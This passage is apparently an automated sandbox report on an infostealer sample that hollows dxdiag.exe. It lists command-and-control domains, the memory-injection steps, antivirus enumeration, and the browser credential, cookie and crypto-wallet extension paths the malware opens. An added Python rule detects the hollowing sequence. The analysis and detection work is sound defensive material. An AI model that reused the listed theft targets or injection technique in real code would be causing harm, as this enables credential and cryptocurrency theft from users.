                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005439000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: NVMware2
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696503903t
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696503903s
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696503903j
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696503903f
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005434000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: dxdiag.exe, 00000002.00000003.1540320401.0000000005439000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696503903p
                Source: C:\Windows\SysWOW64\dxdiag.exe | Process information queried: ProcessInformation

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5A
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: bashfulacid.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: tentabatte.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: curverpluch.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: talkynicer.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: shapestickyr.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: manyrestro.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: slipperyloo.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: wordyfindy.lat
                Source: PI1EA8P74K.exe, 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: marbleshinys.click
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 440000
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 443000
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2DCC008
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
                Source: C:\Windows\SysWOW64\dxdiag.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\PI1EA8P74K.exe | Code function: 0_2_00007FF7137527DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7137527DC
                Source: C:\Windows\SysWOW64\dxdiag.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: dxdiag.exe, 00000002.00000002.1643999732.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603770541.000000000304E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603816067.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: dxdiag.exe, 00000002.00000003.1638835789.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.1643316501.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1610114752.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1640049211.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Windows Defender\MsMpeng.exe
                Source: C:\Windows\SysWOW64\dxdiag.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
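The injection rows in this section read as one sequence: PI1EA8P74K.exe allocates 0x400000 in the newly created dxdiag.exe as execute/read/write, writes a buffer there that starts with 4D5A (an MZ header), follows with writes at 0x401000, 0x440000, 0x443000 and 0x451000 (section-sized offsets inside that same image) and one more at 0x2DCC008, after which dxdiag.exe, a signed DirectX diagnostic tool, loads winhttp.dll and schannel.dll and opens TLS sessions. The last address sits at offset 8 of a page, which is where the 32-bit PEB keeps ImageBaseAddress, so it is consistent with the loader patching the hollowed process's image base to 0x400000, though the report does not show the bytes written. The stateful rule below, an added example and not the sandbox's own logic, correlates those steps per target process and then flags network activity from a process whose image was written by someone else. The event stream is constructed to mirror the report's order; the region size, the bytes after 4D5A and the suspended-create flag are assumptions.

```python
"""Correlating the cross-process events in this section into one detection.

Added example; not the sandbox's own logic. EVENTS mirrors the order the
report shows for PI1EA8P74K.exe -> dxdiag.exe; the region size, the captured
byte prefix beyond 4D5A and the suspended-create flag are assumptions.
"""
from dataclasses import dataclass

PARENT = r"C:\Users\user\Desktop\PI1EA8P74K.exe"
CHILD = r"C:\Windows\SysWOW64\dxdiag.exe"


@dataclass
class Event:
    kind: str                 # create_process | alloc | write | net
    actor: str                # process performing the action
    target: str = ""          # process acted on, or remote endpoint for net
    base: int = 0             # address in the target (alloc/write)
    size: int = 0
    protect: str = ""         # requested page protection (alloc)
    data_prefix: bytes = b""  # leading bytes of the write, if the sensor kept them
    suspended: bool = False   # create_process used CREATE_SUSPENDED


EVENTS = [  # constructed to mirror the report rows
    Event("create_process", PARENT, CHILD, suspended=True),
    Event("alloc", PARENT, CHILD, base=0x400000, size=0x60000, protect="PAGE_EXECUTE_READWRITE"),
    Event("write", PARENT, CHILD, base=0x400000, data_prefix=b"MZ\x90\x00"),
    Event("write", PARENT, CHILD, base=0x401000),
    Event("write", PARENT, CHILD, base=0x440000),
    Event("write", PARENT, CHILD, base=0x443000),
    Event("write", PARENT, CHILD, base=0x451000),
    Event("write", PARENT, CHILD, base=0x2DCC008, size=4),
    Event("net", CHILD, "172.67.148.118:443"),
]

BENIGN_EVENTS = [  # a JIT-style self allocation and a plain child launch must stay quiet
    Event("alloc", CHILD, CHILD, base=0x1000000, size=0x10000, protect="PAGE_EXECUTE_READWRITE"),
    Event("create_process", PARENT, r"C:\Windows\System32\notepad.exe"),
    Event("net", CHILD, "93.184.216.34:443"),
]


def _fresh(creator=None, suspended=False):
    return {"creator": creator, "suspended": suspended, "injector": None,
            "rwx": [], "image_base": None, "writes": []}


def detect_hollowing(events):
    """Alert on a foreign MZ write into an RWX region allocated in the target
    by another process, and on network activity from such a target."""
    state, alerts = {}, []
    for e in events:
        if e.kind == "create_process":
            state[e.target] = _fresh(e.actor, e.suspended)
        elif e.kind == "alloc" and e.actor != e.target:
            s = state.setdefault(e.target, _fresh())
            if "EXECUTE" in e.protect and "WRITE" in e.protect:
                s["rwx"].append((e.base, e.base + e.size))
        elif e.kind == "write" and e.actor != e.target:
            s = state.setdefault(e.target, _fresh())
            s["writes"].append(e.base)
            in_rwx = any(lo <= e.base < hi for lo, hi in s["rwx"])
            if in_rwx and e.data_prefix.startswith(b"MZ"):
                s["image_base"], s["injector"] = e.base, e.actor
        elif e.kind == "net":
            s = state.get(e.actor)
            if s and s["image_base"] is not None:
                alerts.append({"rule": "hollowed_host_network", "process": e.actor,
                               "remote": e.target, "injected_by": s["injector"]})
    for target, s in state.items():
        if s["image_base"] is None:
            continue
        lo, hi = next(r for r in s["rwx"] if r[0] <= s["image_base"] < r[1])
        alerts.append({"rule": "foreign_pe_image_write", "target": target,
                       "injector": s["injector"], "image_base": s["image_base"],
                       "suspended_create": s["suspended"],
                       "writes_in_image": [w for w in s["writes"] if lo <= w < hi],
                       "writes_outside_image": [w for w in s["writes"] if not lo <= w < hi]})
    return alerts


if __name__ == "__main__":
    for alert in detect_hollowing(EVENTS):
        print(alert)
```

Real sensors usually record only the target address and size of a cross-process write, not the bytes; when the prefix is missing, an RWX allocation at a conventional image base (0x400000 for 32-bit) followed by writes at section-aligned offsets inside it is still enough to raise the first alert, and the small write outside that region is worth keeping in the record for the analyst.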

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: dxdiag.exe PID: 8016, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                Source: dxdiag.exe | String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: dxdiag.exe, 00000002.00000003.1553515903.00000000054BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Libertyn
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: dxdiag.exe, 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffffla
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
